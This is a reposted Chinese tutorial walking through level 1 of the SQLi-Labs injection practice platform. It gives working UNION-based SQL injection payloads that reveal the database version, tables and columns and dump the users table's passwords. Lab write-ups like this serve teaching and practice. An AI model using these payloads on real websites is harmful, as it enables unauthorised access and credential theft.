碼上快樂

相關內容    簡體    繁體

SQLi-Labs SQL注入練習平台(第一關)

本文轉載自   查看原文   2018-01-18 16:28   6014    Web安全

        所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串,最終達到欺騙服務器執行惡意的SQL命令。具體來說,它是利用現有應用程序,將(惡意的)SQL命令注入到后台數據庫引擎執行的能力,它可以通過在Web表單中輸入(惡意)SQL語句得到一個存在安全漏洞的網站上的數據庫,而不是按照設計者意圖去執行SQL語句。-----百度百科

  我用的是看雪論壇提供的平台:http://43.247.91.228:84/

  一般來說習慣先加一個單引號(英文),來判斷

  其中%27為單引號通過url編碼而來,其他的編碼可以參考百度百科的  https://baike.baidu.com/item/URL%E7%BC%96%E7%A0%81/3703727?fr=aladdin,由上圖可知加單引號報錯錯誤

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

  將單引號分開些,貌似可以更好的理解

 

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '   '   1'   ' LIMIT 0,1' at line 1

  發現單引號並沒有匹配,由此可知sql語句為:

select * from users where id='$id'

  所以我們使用: and '1'='1 進行匹配:

  返回正常

  構造語句 

id=-1 ' union select 1,2,3 --+

 

id=-1 ' union select 1,version(),3 --+

  數據庫版本

  查看數據庫

id=-1 ' union select 1,database(),3 --+

  查看表

-1 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=0x7365637572697479 --+

查看users表

union select 1,group_concat(column_name),3 from information_schema.columns where table_name=0x7573657273

  發現users表中有 id username password 三個字段,查看password 

-1'union select 1,password,3 from users--+

  個人理解,可能存在錯誤。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 sqli-labs第一關 詳解 sqli_labs第一關 sqli-labs-master 第一關 sqli-labs-第一關(讓你過,還讓你知道為什么這么做,寶貝) Sqli-labs 學前准備 搭建SQL注入平台 SQL注入靶場sqli-labs 1-65關全部通關教程 sqli-labs(7-8關) 通過sqli-labs學習sql注入——基礎挑戰之less1 sqli-labs闖關之1-10關 sqli-labs第二關 詳解
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM